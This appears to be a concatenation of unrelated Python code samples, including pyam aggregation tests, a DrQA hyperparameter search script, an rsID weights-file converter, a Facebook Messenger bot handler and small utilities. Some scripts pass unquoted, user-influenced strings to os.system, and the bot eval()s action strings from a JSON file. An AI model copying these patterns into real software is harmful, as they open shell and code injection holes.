                              region='R5ASIA',
                              subregions=['foo', 'bar', 'baz'],
                              components=[], append=False)
    assert len(obs) == 2


def test_aggregate_region_missing_all_subregions():
    """If no subregion exists in the data, the aggregation is empty."""
    cols = ['model', 'scenario', 'region', 'variable', 'unit', 2005, 2010]
    data = pd.DataFrame([
        ['model_a', 'scen_a', 'foo', 'Primary Energy', 'EJ/y', 1, 6],
        ['model_a', 'scen_a', 'bar', 'Primary Energy', 'EJ/y', 0.75, 5]],
        columns=cols)
    df = IamDataFrame(data=data)
    obs = df.aggregate_region(variable='Primary Energy',
                              region='R5ASIA',
                              subregions=['China', 'Vietnam', 'Japan']
                              )
    assert len(obs) == 0
def test_do_aggregate_append(check_aggregate_df=None, meta_df=None):
    """Placeholder signature comment removed below — see real def."""


def _removed():  # (documentation scaffolding only; see functions below)
    pass
def run_check_agg_fail(pyam_df, tweak_dict, test_type):
    """Perturb one data row by 1% and assert the aggregate check flags it.

    :param pyam_df: IamDataFrame fixture to mutate in place
    :param tweak_dict: model/scenario/region/variable/unit of the row to tweak
    :param test_type: 'aggregate', a '*region*' variant, or
        'region-world-only-contrib' — controls which check runs and which
        index the failure is expected under
    """
    mr = pyam_df.data.model == tweak_dict['model']
    sr = pyam_df.data.scenario == tweak_dict['scenario']
    rr = pyam_df.data.region == tweak_dict['region']
    vr = pyam_df.data.variable == tweak_dict['variable']
    ur = pyam_df.data.unit == tweak_dict['unit']
    row_to_tweak = mr & sr & rr & vr & ur
    assert row_to_tweak.any()

    # NOTE(review): chained indexing (`.data.value.iloc[...] *=`) relies on
    # `.data` returning a live view; newer pandas/pyam may make this a no-op
    # copy — confirm before upgrading.
    pyam_df.data.value.iloc[np.where(row_to_tweak)[0]] *= 0.99

    # the error variable is always the top level one
    expected_index = tweak_dict
    agg_test = test_type == 'aggregate'
    region_world_only_contrib = test_type == 'region-world-only-contrib'
    if agg_test or region_world_only_contrib:
        expected_index['variable'] = '|'.join(
            expected_index['variable'].split('|')[:2]
        )
    elif 'region' in test_type:
        expected_index['region'] = 'World'
    expected_index = [v for k, v in expected_index.items()]

    for variable in pyam_df.variables():
        if test_type == 'aggregate':
            obs = pyam_df.check_aggregate(
                variable,
            )
        elif 'region' in test_type:
            obs = pyam_df.check_aggregate_region(
                variable,
            )
        # NOTE(review): if test_type matches neither branch, `obs` is unbound
        # here and this raises NameError rather than a clean assertion.
        if obs is not None:
            assert len(obs.columns) == 2
            assert set(obs.index.get_values()[0]) == set(expected_index)
def test_df_check_aggregate_fail(check_aggregate_df):
    """Tweaking a regional CO2 row must fail the variable aggregate check."""
    to_tweak = {
        'model': 'IMG',
        'scenario': 'a_scen_2',
        'region': 'R5REF',
        'variable': 'Emissions|CO2',
        'unit': 'Mt CO2/yr',
    }
    run_check_agg_fail(check_aggregate_df, to_tweak, 'aggregate')


def test_df_check_aggregate_fail_no_regions(check_aggregate_df):
    """A World-only leaf variable can still break its parent aggregate."""
    to_tweak = {
        'model': 'MSG-GLB',
        'scenario': 'a_scen_2',
        'region': 'World',
        'variable': 'Emissions|C2F6|Solvents',
        'unit': 'kt C2F6/yr',
    }
    run_check_agg_fail(check_aggregate_df, to_tweak, 'aggregate')


def test_df_check_aggregate_region_fail(check_aggregate_df):
    """Tweaking the World row must fail the regional aggregate check."""
    to_tweak = {
        'model': 'IMG',
        'scenario': 'a_scen_2',
        'region': 'World',
        'variable': 'Emissions|CO2',
        'unit': 'Mt CO2/yr',
    }
    run_check_agg_fail(check_aggregate_df, to_tweak, 'region')


def test_df_check_aggregate_region_fail_no_subsector(check_aggregate_df):
    """A variable without sub-sectors still participates in regional checks."""
    to_tweak = {
        'model': 'MSG-GLB',
        'scenario': 'a_scen_2',
        'region': 'R5REF',
        'variable': 'Emissions|CH4',
        'unit': 'Mt CH4/yr',
    }
    run_check_agg_fail(check_aggregate_df, to_tweak, 'region')


def test_df_check_aggregate_region_fail_world_only_var(check_aggregate_df):
    """World-only contributions are attributed to the top-level variable."""
    to_tweak = {
        'model': 'MSG-GLB',
        'scenario': 'a_scen_2',
        'region': 'World',
        'variable': 'Emissions|CO2|Agg Agg',
        'unit': 'Mt CO2/yr',
    }
    run_check_agg_fail(
        check_aggregate_df, to_tweak, 'region-world-only-contrib'
    )
def test_df_check_aggregate_region_errors(check_aggregate_regional_df):
    """Regional checks without component info double-count and must fail."""
    # these tests should fail because our dataframe has continents and regions
    # so checking without providing components leads to double counting and
    # hence failure
    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O', 'World'
    )
    assert len(obs.columns) == 2
    assert obs.index.get_values()[0] == (
        'AIM', 'cscen', 'World', 'Emissions|N2O', 'Mt N/yr'
    )

    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O', 'REUROPE'
    )
    assert len(obs.columns) == 2
    assert obs.index.get_values()[0] == (
        'AIM', 'cscen', 'REUROPE', 'Emissions|N2O', 'Mt N/yr'
    )


def test_df_check_aggregate_region_components(check_aggregate_regional_df):
    """Explicit subregion lists make the regional checks pass."""
    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O', 'World', subregions=['REUROPE', 'RASIA']
    )
    assert obs is None

    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O|Ind|Solvents', 'World', subregions=['REUROPE', 'RASIA']
    )
    assert obs is None

    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O', 'REUROPE', subregions=['Germany', 'UK']
    )
    assert obs is None

    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O', 'RASIA', subregions=['China', 'Japan']
    )
    assert obs is None

    obs = check_aggregate_regional_df.check_aggregate_region(
        'Emissions|N2O|Ind|Transport', 'REUROPE', subregions=['Germany', 'UK']
    )
    assert obs is None


@pytest.mark.parametrize("components,exp_vals", (
    # should find sub-components including nested bunkers
    (None, [1.9, 15.7]),
    # should only add AFOLU onto regional sum, not Shipping emissions
    (["Emissions|N2O|AFOLU"], [0.9, 9.7]),
    # specifying Ind leads to double counting (and not skipping AFOLU) but as
    # it's user specified no warning etc. is raised
    (["Emissions|N2O|Ind"], [2.6, 25.2]),
))
def test_aggregate_region_components_handling(check_aggregate_regional_df,
                                              components, exp_vals):
    """Component selection controls what is added on top of the subregion sum."""
    tdf = check_aggregate_regional_df.filter(variable="*N2O*")
    # only get Europe and Asia to avoid double counting
    res = tdf.aggregate_region("Emissions|N2O", components=components,
                               subregions=["REUROPE", "RASIA"])
    exp_idx = pd.MultiIndex.from_product(
        [["AIM"], ["cscen"], ["Mt N/yr"], [2005, 2010]],
        names=["model", "scenario", "unit", "year"]
    )
    exp = pd.Series(exp_vals, index=exp_idx)
    exp.name = "value"
    pd.testing.assert_series_equal(res, exp)


def test_check_aggregate_region_no_world(check_aggregate_regional_df, caplog):
    """A missing World region logs an INFO message instead of failing hard."""
    test_df = check_aggregate_regional_df.filter(region='World', keep=False)
    caplog.set_level(logging.INFO, logger="pyam.core")
    test_df.check_aggregate_region('Emissions|N2O', region='World')
    warn_idx = caplog.messages.index("variable `Emissions|N2O` does not exist "
                                     "in region `World`")
    assert caplog.records[warn_idx].levelname == "INFO"
| StarcoderdataPython |
1711351 | <gh_stars>0
import itertools
import os
import subprocess
import numpy as np
import time
import datetime
from hyperopt import hp
import pandas as pd
# All paths below are relative to the DrQA checkout in the user's home dir.
HomeDir = os.environ.get('HOME')
# os.chdir(os.path.join(HomeDir,"CS3244/DrQA"))
os.chdir(os.path.join(HomeDir, "DrQA"))
# print(os.getcwd())

# CSV summarising the best trials after the final re-training pass.
top10_result = "validation/top10_result.csv"
# When True, training output is discarded (appends "&> /dev/null").
hide_output = False
# Number of hyperopt trials to run.
MAX_EVALS = 1

#### Fixed Parameters ##
# CLI arguments passed to every training run; --model-name/--model-dir are
# filled in per trial by objective().
fixed_params = {
    "--num-epoch": 1,
    "--embedding-file": "glove.6B.200d.txt",
    "--model-name": "",
    "--model-dir": "",
    "--train-file": "ln_train-processed-corenlp.txt",
    "--dev-file": "ln_dev-processed-corenlp.txt",
    "--dev-json": "ln_dev.json",
    "--train-json": "ln_train.json",
    "--pretrained": "models/pre_trained_single/64_2_no_concat_200.mdl"
}
#### Hyper parameters ###
# Hyperopt search space: hp.choice entries are effectively fixed (single
# option) except the booleans; the dropout/decay/momentum rates are sampled
# uniformly from [0, 1].
params = {
    "--batch-size": hp.choice('--batch-size', [32]),
    "--model-type": hp.choice('--model-type', ['rnn']),
    "--hidden-size": hp.choice('--hidden-size', [64]),
    "--doc-layers": hp.choice('--doc-layers', [2]),
    "--question-layers": hp.choice('--question-layers', [2]),
    "--rnn-type": hp.choice('--rnn-type', ['LSTM']),
    "--concat-rnn-layers": hp.choice('--concat-rnn-layers', [False]),
    "--question-merge": hp.choice('--question-merge', ['self_attn']),
    "--dropout-emb": hp.uniform('--dropout-emb', 0, 1),
    "--dropout-rnn": hp.uniform('--dropout-rnn', 0, 1),
    "--dropout-rnn-output": hp.choice('--dropout-rnn-output', [True, False]),
    "--grad-clipping": hp.choice('--grad-clipping', [10]),
    "--weight-decay": hp.uniform('--weight-decay', 0, 1),
    "--momentum": hp.uniform('--momentum', 0, 1),
    "--fix-embedding": hp.choice('--fix-embedding', [True, False]),
    "--tune-partial": hp.choice('--tune-partial', [1000]),
    "--rnn-padding": hp.choice('--rnn-padding', [True, False]),
    "--max-len": hp.choice('--max-len', [15])}
def objective(param):
    """Hyperopt objective: train one DrQA reader with *param*, return -F1.

    Builds a shell command from the module-level ``fixed_params`` plus the
    sampled ``param`` dict, runs training via the shell, then parses the
    best-epoch log the trainer writes. Mutates the module-level
    ``fixed_params`` and the ``ith`` trial counter.
    """
    start = time.time()
    CMD = "python scripts/reader/train.py"
    # The model name encodes the sampled hyperparameter values.
    model_name = "_".join(list(map(lambda x: str(x), param.values())))
    model_dir = "models/val_models/" + model_name + "/"
    fixed_params["--model-name"] = model_name
    fixed_params["--model-dir"] = model_dir
    for name, value in fixed_params.items():
        CMD += " " + name + " " + str(value)
    for name, value in param.items():
        CMD = CMD + " " + name + " " + str(value)
    if hide_output:
        CMD = CMD + " &> /dev/null"
    # NOTE(review): the command is concatenated into a shell string without
    # any quoting; a parameter value containing spaces or shell
    # metacharacters would break (or be unsafe to run).
    os.system("bash -c \"" + CMD + "\"")
    with open(model_dir + model_name + "_best.txt", 'r') as log:
        log_ = log.readline().split(',')
        F1 = -float(log_[1])  # negated because hyperopt minimizes the loss
    end = time.time()
    time_elapsed = end - start
    print("Comb: " + str(ith[0]))
    print("F1: " + str(log_[1]) + " EM: " + str(log_[2]))
    print("Time Elapsed: " + str(datetime.timedelta(seconds = time_elapsed)))
    print("Time Remaining: " + str(datetime.timedelta(seconds = time_elapsed*(MAX_EVALS -ith[0]))))
    print("_"*100)
    ith[0] = ith[0]+1
    results = {'loss':F1,'status': STATUS_OK, 'x': param, 'time':time_elapsed}
    return results
from hyperopt import Trials
from hyperopt import fmin
from hyperopt import rand, tpe
from hyperopt import STATUS_OK

# 1-based trial counter shared with objective() (a list so the closure can
# mutate it).
ith = [1]

# Run the TPE search over the space defined above.
tpe_algo = tpe.suggest
tpe_trials = Trials()
best = fmin(fn = objective, space = params, algo=tpe_algo, trials= tpe_trials,
            max_evals = MAX_EVALS, rstate = np.random.RandomState(50))

print('Minimum loss attained with TPE: {:.4f}'.format(tpe_trials.best_trial['result']['loss']))
print(len(tpe_trials.results))

# Persist all trials sorted by loss (loss is -F1, so best first).
results = tpe_trials.results
results_df = pd.DataFrame({'loss': [x['loss'] for x in results],
                           'x': [x['x'] for x in results]})
results_df = results_df.sort_values('loss', ascending = True)
results_df.to_csv('validation/data_frame_result.csv', sep =",")
# Re-train the best trials for one final epoch and record their metrics.
header = ",".join(['epoch_best', 'F1_Dev_best', 'EM_Dev_best', 'S_Dev_best',
                   'E_Dev_best', 'Exact_Dev_best', 'F1_Train', 'EM_train',
                   'S_Train', 'E_Train', 'Exact_Train', 'Loss_Train'])

# NOTE(review): despite the "top 10" naming this keeps len(results)/20 trials
# (5%); with MAX_EVALS = 200 that happens to equal 10 — confirm the intended
# selection size before changing it.
if len(results) >= 10:
    top_10 = int(len(results) / 20)
else:
    top_10 = 1

# Bug fix: `results` (tpe_trials.results) is in execution order, so indexing
# it directly retrained the *first* trials, not the best ones. Rank by loss
# (loss is -F1, so ascending order puts the best trial first).
ranked = sorted(results, key=lambda r: r['loss'])

# `with` guarantees the CSV is closed even if a training subprocess fails.
with open(top10_result, 'w') as result:
    result.write(header + "\n")
    for i in range(top_10):
        param = ranked[i]['x']
        CMD = "python scripts/reader/train.py"
        model_name = "_".join(list(map(lambda x: str(x), param.values())))
        model_dir = "models/val_models/" + model_name + "/"
        fixed_params["--model-name"] = model_name
        fixed_params["--model-dir"] = model_dir
        fixed_params["--num-epoch"] = 1
        for name, value in fixed_params.items():
            CMD += " " + name + " " + str(value)
        for name, value in param.items():
            CMD = CMD + " " + name + " " + str(value)
        if hide_output:
            CMD = CMD + " &> /dev/null"
        os.system("bash -c \"" + CMD + "\"")
        log_result = []
        with open(model_dir + model_name + "_best.txt", 'r') as log:
            log_ = log.readline().split(' ')
            log_result.extend(log_)
        result.write(",".join(log_result) + "\n")
| StarcoderdataPython |
3290841 | import fnmatch
import string
def timeCheck(line):
    """Return the set of time-related words found in *line*.

    The line is lower-cased and stripped of punctuation before being split
    into words; the result is the (possibly empty) set of words that appear
    in the known time vocabulary (weekdays, months, clock terms, ...).
    """
    # frozenset: membership vocabulary is constant, and set-set intersection
    # is the natural operation below.
    timePhrase = frozenset([
        'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday',
        'sunday', 'january', 'jan', 'february', 'feb', 'march', 'mar',
        'april', 'apr', 'may', 'june', 'jun', 'july',
        'august', 'aug', 'september', 'sep', 'october', 'oct', 'november',
        'nov', 'december', 'dec', 'am', 'pm',
        'morning', 'afternoon', 'night', 'midnight', 'day', 'week', 'month',
        'year', 'second', 'minute', 'hour', 'noon', 'clock', 'oclock'])
    words = line.lower().translate(str.maketrans('', '', string.punctuation)).split()
    return set(words).intersection(timePhrase)
#if str.lower() in timePhrase:
#print(timePhrase.index(str.lower()))
#print(timePhrase.index('aug'))
| StarcoderdataPython |
1606761 | <reponame>ciwan6521/udemy
# -*- coding: utf-8 -*-
class ögretmen():
    """A simple teacher record: name, phone, salary and taught lessons."""

    def __init__(self, ad, soyad, telefon, maas, dersler):
        # Plain attribute storage; `dersler` is kept under the `ders` attribute.
        self.ad, self.soyad, self.telefon = ad, soyad, telefon
        self.maas = maas
        self.ders = dersler

    def bilgiler(self):
        """Print a human-readable summary of this teacher (returns None)."""
        print("""
        Öğretmenin Adı : {}
        Öğretmenin Soyadı : {}
        Öğretmenin Numarası : {}
        Öğretmenin Maaşı : {}
        Öğretmenin Bildiği Dersler : {}
        """.format(self.ad, self.soyad, self.telefon, self.maas, self.ders))

    def zamyap(self, zammiktarı):
        """Apply a raise: add *zammiktarı* to the salary in place."""
        self.maas += zammiktarı
# Demo usage of the ögretmen class.
Murat = ögretmen("Murat","Kaya",123,5000,["Matematik","Fen","İngilizce"])
# NOTE(review): zamyap() mutates maas and returns None, so this line prints "None";
# same for bilgiler(), which prints its own output and also returns None.
print(Murat.zamyap(750))
print(Murat.bilgiler())
| StarcoderdataPython |
192001 | # Generated by Django 3.2.dev20200604053612 on 2020-06-07 07:22
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (see header comment): adds an optional
    # `location` choice field to Menu and resets the `picture` upload path.
    # Do not hand-edit applied migrations; create a new one instead.

    dependencies = [
        ('project', '0007_auto_20200606_1112'),
    ]
    operations = [
        migrations.AddField(
            model_name='menu',
            name='location',
            field=models.CharField(blank=True, choices=[('Koulukatu', 'Koulukatu'), ('Ideapark', 'Ideapark')], max_length=30),
        ),
        migrations.AlterField(
            model_name='menu',
            name='picture',
            field=models.ImageField(upload_to=''),
        ),
    ]
| StarcoderdataPython |
33224 | #!/usr/bin/env python3
#===============================================================================
# Copyright (c) 2020 <NAME>
# Lab of Dr. <NAME> and Dr. <NAME>
# University of Michigan
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#============================================================================
############################
##### IMPORT MODULES #######
###########################
import os
import sys
import sqlite3
import rsidx
import argparse
import gzip
###########################
##### PARSE ARGUMENTS ####
###########################
def get_settings():
    """Parse and return the command-line arguments for this script."""
    arg_parser = argparse.ArgumentParser(
        description="Convert weights files with just rsIDs to ones with chromosomes and coordinates too\n")
    # Required inputs.
    arg_parser.add_argument("-v", "--vcf", help="bgzipped and tabixed vcf file", type=str, required=True)
    arg_parser.add_argument("-r", "--rsidx", help="rsidx file", type=str)
    arg_parser.add_argument("-w", "--weights", help="weights file. assumes one header. will skip lines with #", type=str, required=True)
    # Optional tuning.
    arg_parser.add_argument("-c", "--col", help="0-based column in weights file that rsID is in", type=int, default=0)
    arg_parser.add_argument("-p", "--prefix", help="Prefix for output file, including path", type=str, required=True)
    return arg_parser.parse_args()
###############################
######## SUB ROUTINES #########
###############################
def open_zip(f):
    """Open *f* for text reading, transparently handling gzip.

    Returns an open text-mode file handle.  ``"-"`` means standard input.
    """
    if f.endswith(".gz"):  # bug fix: a substring test matched names like "x.gz.bak"
        command = gzip.open(f, "rt")
        print("Opening gzipped file %s\n" % f, file=sys.stderr)
    elif f == "-":
        command = sys.stdin  # bug fix: sys.stdin is a file object, not callable
    else:
        command = open(f, "rt")
        print("Opening file %s\n" % f, file=sys.stderr)
    return command
def index(vcf):
    """Build an rsidx SQLite index for *vcf*.

    NOTE(review): the database path 'myidx.db' is hard-coded and the index is
    written in the current working directory — confirm this is intended, as
    main() uses a user-supplied --rsidx path instead.
    """
    with sqlite3.connect('myidx.db') as dbconn, open(vcf, 'r') as vcffh:
        rsidx.index.index(dbconn, vcffh)
# rsidx index 00-All.vcf.gz 00-All.vcf.rsidx
def search(rsidlist,vcf,index):
    """Look up each rsID from *rsidlist* in *vcf* via the rsidx *index*.

    Returns a dict mapping rsID -> first five VCF columns
    [CHROM, POS, ID, REF, ALT].  Reports to stderr how many of the input
    rsIDs were found.  Duplicate rsIDs in the VCF keep only the last hit.
    """
    print("Querying markers from weights file in VCF\n",file=sys.stderr)
    in_len=len(rsidlist)
    rsid_dict={}
    with sqlite3.connect(index) as dbconn:
        for line in rsidx.search.search(rsidlist, dbconn, vcf):
            ls=line.rstrip()
            lineList=ls.split("\t")
            rsid_dict[lineList[2]]=lineList[:5] #assumes VCF is chr, pos, rsID, REF, ALT
    # Compare how many distinct rsIDs came back against how many were requested.
    out_len=len(rsid_dict.keys())
    if in_len!=out_len:
        diff=int(in_len)-int(out_len)
        print("Not all rsIDs from weights file could be found in the VCF. Missing %d of %d\n" % (diff,in_len),file=sys.stderr)
    else:
        print("All %d rsIDs from weights file could be found in the VCF.\n" % in_len,file=sys.stderr)
    return rsid_dict
def rsid_from_weights(weights, col):
    """Collect the rsIDs from column *col* (0-based) of a weights file.

    Lines starting with '#' are ignored, as is the first non-'#' line
    (assumed to be the header).  Blank lines are skipped.
    """
    print("Getting rsIDs from weights file %s\n" % weights, file=sys.stderr)
    command = open_zip(weights)
    rsid_list = []
    header_count = 0
    with command as f:
        for line in f:
            ls = line.rstrip()
            if not ls or ls[0] == "#":
                # bug fix: blank lines used to raise IndexError on ls[0]
                continue
            if header_count == 0:
                # skip the single header row after any '#' lines
                # (bug fix: the original used a bare `next`, which is a no-op)
                header_count += 1
                continue
            rsid_list.append(ls.split()[col])
    return rsid_list
def merge(weights, col, rsid_dict, prefix):
    """Write <prefix>_reformat.txt(.gz): the weights file with CHR/POS/REF/ALT appended.

    *rsid_dict* maps rsID -> [CHROM, POS, ID, REF, ALT] (see search()).
    Rows whose rsID is missing from the VCF get four "NA" columns; rows with
    multiple ALT alleles are expanded to one output line per allele.
    Returns 0 on success.
    """
    command = open_zip(weights)
    header_count = 0
    output = prefix + "_reformat.txt"
    print("Writing new weights file %s\n" % output, file=sys.stderr)
    # `with` closes both handles; the explicit close() calls were redundant.
    with open(output, "w") as o, command as f:
        for line in f:
            ls = line.rstrip()
            if not ls:
                continue  # bug fix: blank lines used to raise IndexError on ls[0]
            if ls[0] == "#":
                o.write(ls + "\n")  # pass '#' comment lines through unchanged
            elif header_count == 0:
                lineList = ls.split()
                o.write("\t".join(lineList + ["CHR", "POS", "REF", "ALT"]) + "\n")  # write header
                header_count += 1
            else:
                lineList = ls.split()
                try:
                    from_vcf = rsid_dict[lineList[col]]  # look up from dictionary from vcf
                    # handle occurrence of multiple alt alleles by printing each
                    # potential entry as a new line
                    for alt_allele in from_vcf[4].split(","):
                        o.write("\t".join(lineList + from_vcf[0:2] + [from_vcf[3]] + [alt_allele]) + "\n")
                except KeyError:
                    o.write("\t".join(lineList + ["NA"] * 4) + "\n")  # rsid not in VCF
    # system call to gzip the result.
    # SECURITY NOTE: `output` is built from the user-supplied --prefix and is
    # passed unquoted to the shell; prefer subprocess.run(["gzip", output]).
    os.system("gzip " + output)
    return 0
#########################
########## MAIN #########
#########################
def main():
    """Entry point: validate inputs, query the VCF, and write the merged weights file."""
    # get arguments
    args = get_settings()
    print(args)
    # github package https://github.com/bioforensics/rsidx
    if not os.path.exists(args.vcf):
        sys.exit("VCF does not exist\n")
    # bug fix: -r/--rsidx is optional in argparse, so args.rsidx may be None and
    # os.path.exists(None) raised TypeError instead of a clean error message.
    if args.rsidx is None or not os.path.exists(args.rsidx):
        sys.exit("RSIDX does not exist\n")
    # index(args.vcf)
    # get rsids from weights file
    rsid_list = rsid_from_weights(args.weights, args.col)
    # search vcf
    rsid_dict = search(rsid_list, args.vcf, args.rsidx)
    # merge new info with weights file
    merge(args.weights, args.col, rsid_dict, args.prefix)
#call main
if __name__ == "__main__":
main()
111
| StarcoderdataPython |
126311 | <gh_stars>1-10
from __future__ import absolute_import
from __future__ import print_function
import os
import json
import apiai
import requests
import base64
import sys
import random
import uuid
import time
from timeit import default_timer as timer
from flask import request
from actions import *
class FacebookHandler(object):
    """
    The facebook handler acts as the interface to handle all requests coming
    from messenger.
    It parses the payload and responds
    """
    def __init__(self, pid, pat, verify_token, ozz_guid, actions, redis_db, mongo, log):
        # pid: page id; pat: page access token; verify_token: webhook handshake secret.
        self.pid = pid
        self.pat = pat
        self.verify_token = verify_token
        self.ozz_guid = ozz_guid
        self.redis_db = redis_db
        self.mongo = mongo
        self.log = log
        # intent -> action mapping loaded from a JSON file path.
        with open(actions,"r") as jsonFile:
            self.actions = json.load(jsonFile)
        # NOTE(review): self.api is only assigned when ozz_guid starts with 'api_';
        # respond() reads self.api unconditionally, so other ozz_guid values would
        # raise AttributeError — confirm.
        if ozz_guid != "":
            if ozz_guid[:4] == 'api_':
                self.api = apiai.ApiAI(ozz_guid[4:])
        print("Messenger endpoint - /api/messages/facebook")
    def verify(self,*args,**kwargs):
        # Facebook webhook verification handshake: echo hub.challenge when the
        # supplied hub.verify_token matches ours.
        if request.args.get('hub.verify_token','') == self.verify_token:
            return request.args.get('hub.challenge','')
        else:
            return "Error, wrong validation token"
    def respond(self,*args,**kwargs):
        # Handle an incoming Messenger webhook POST: for each event, run NLU,
        # dispatch the configured action (or echo), and log to Mongo.
        payload = request.get_json()
        for sender, message in self.messaging_events(payload):
            if sender != self.pid:
                # messaging_events yields bytes for real messages; str means skip.
                if type(message) != str:
                    start = timer()
                    intent=None
                    entities=None
                    action=None
                    message = message.decode('utf-8')
                    # Fetch sender profile from the Graph API for the session context.
                    r = requests.get("https://graph.facebook.com/v2.6/"+ sender + "?fields=first_name,last_name,profile_pic,locale,timezone,gender&access_token=" + self.pat)
                    r_data = json.loads(r.text)
                    session = {}
                    session['user'] = {
                        'id':sender,
                        'name':r_data['first_name'] + ' ' + r_data['last_name'],
                        'profile_pic':r_data['profile_pic'],
                        'locale':r_data['locale'],
                        'timezone':r_data['timezone'],
                        'gender':r_data['gender']
                    }
                    session['cache'] = self.redis_db
                    session['mongo'] = self.mongo
                    session['message'] = message
                    session['channel'] = 'facebook'
                    if self.api:
                        # Run the message through api.ai (Dialogflow) NLU.
                        r = self.api.text_request()
                        r.session_id = uuid.uuid4().hex
                        r.query = message
                        res = r.getresponse()
                        res = json.loads(res.read().decode('utf-8'))
                        intent = res["result"]["action"]
                        if intent == '':
                            intent = res["result"]["metadata"]["intentName"]
                        response = res["result"]["fulfillment"]["speech"]
                        entities = res["result"]['parameters']
                        session['intent'] = intent
                        session['entities'] = entities
                        print(intent)
                        if intent in self.actions:
                            action = self.actions[intent]
                            # A list action means canned replies; pick one at random.
                            if type(self.actions[intent]) == list:
                                response = random.choice(self.actions[intent])
                                self.send_message(self.pat,sender,response)
                            else:
                                # SECURITY NOTE: eval() executes the action string from
                                # the actions JSON as code — the file must be trusted.
                                func = eval(self.actions[intent])
                                func(session)
                        elif response != "":
                            # No configured action: reply with the NLU fulfillment text.
                            end = timer()
                            runtime = str(end - start)
                            if self.mongo:
                                log_object = {"message":message,"channel":"facebook","intent":intent,"entities":entities,"action":action,"response":str(response),"runtime":runtime,"time":str(time.time())}
                                self.mongo.db.logs.insert_one(log_object)
                            self.send_message(self.pat, sender, response)
                        else:
                            # Nothing to say: echo the user's message back.
                            end = timer()
                            runtime = str(end - start)
                            if self.mongo:
                                log_object = {"message":message,"channel":"facebook","intent":intent,"entities":entities,"action":action,"response":str(message),"runtime":runtime,"time":str(time.time())}
                                self.mongo.db.logs.insert_one(log_object)
                            self.send_message(self.pat, sender, message)
        return "responded"
    def messaging_events(self, payload):
        # Generator over (sender_id, text_bytes) pairs in a webhook payload.
        # Skips events from our own page id and read/delivery receipts.
        data = payload
        messaging_events = data["entry"][0]["messaging"]
        for event in messaging_events:
            if event["sender"]["id"] == self.pid:
                continue
            elif 'read' in event:
                continue
            elif 'delivery' in event:
                continue
            else:
                if "message" in event and "text" in event["message"]:
                    yield event["sender"]["id"], event["message"]["text"].encode('unicode_escape')
                elif "postback" in event and "payload" in event["postback"]:
                    yield event["sender"]["id"], event["postback"]["payload"].encode('unicode_escape')
    def send_message(self, token, recipient, text):
        """Send the message text to recipient with id recipient.
        """
        # Python 2/3 compatibility: only py2 needs the unicode_escape decode.
        if sys.version_info >= (3, 0):
            message = text
        else:
            message = text.decode('unicode_escape')
        r = requests.post("https://graph.facebook.com/v2.6/me/messages",
            params={"access_token": token},
            data=json.dumps({
                "recipient": {"id": recipient},
                "message": {"text": message}
            }),
            headers={'Content-type': 'application/json'})
        if r.status_code != requests.codes.ok:
            print(r.text)
1618666 | <reponame>object-oriented-human/competitive
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'pangrams' function below.
#
# The function is expected to return a STRING.
# The function accepts STRING s as parameter.
#
def pangrams(s):
    """Return 'pangram' if *s* contains every letter a-z (case-insensitive),
    otherwise 'not pangram'.
    """
    # set.issubset iterates the lower-cased string's characters directly,
    # replacing the original per-letter linear scans.
    letters = set("abcdefghijklmnopqrstuvwxyz")
    return "pangram" if letters.issubset(s.lower()) else "not pangram"
if __name__ == '__main__':
    # HackerRank harness: read one line from stdin, write the verdict to the
    # file named by the OUTPUT_PATH environment variable.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    s = input()
    result = pangrams(s)
    fptr.write(result + '\n')
    fptr.close()
| StarcoderdataPython |
3343903 | <filename>src/transformers/trainer_utils.py
import random
from typing import Any, Dict, List, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import is_tf_available, is_torch_available, is_torch_tpu_available
from .tokenization_utils_base import ExplicitEnum
if is_torch_available():
import torch
def set_seed(seed: int):
    """
    Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf``
    (if installed).
    Args:
        seed (:obj:`int`): The seed to set.
    """
    random.seed(seed)
    np.random.seed(seed)
    # Frameworks are imported lazily inside the availability guards so that
    # neither torch nor tensorflow is a hard dependency of this module.
    if is_torch_available():
        import torch
        torch.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)
        # ^^ safe to call this function even if cuda is not available
    if is_tf_available():
        import tensorflow as tf
        tf.random.set_seed(seed)
class EvalPrediction(NamedTuple):
    """
    Evaluation output (always contains labels), to be used to compute metrics.
    Parameters:
        predictions (:obj:`np.ndarray`): Predictions of the model.
        label_ids (:obj:`np.ndarray`): Targets to be matched.
    """
    predictions: Union[np.ndarray, Tuple[np.ndarray]]
    label_ids: np.ndarray
class PredictionOutput(NamedTuple):
    """Output of a prediction run: model predictions, optional labels, and
    optional metrics computed from them."""
    predictions: Union[np.ndarray, Tuple[np.ndarray]]
    label_ids: Optional[np.ndarray]
    metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
    """Output of training: the final global step and the average training loss."""
    global_step: int
    training_loss: float
# Directory-name prefix used for saved checkpoints ("checkpoint-<step>").
PREFIX_CHECKPOINT_DIR = "checkpoint"
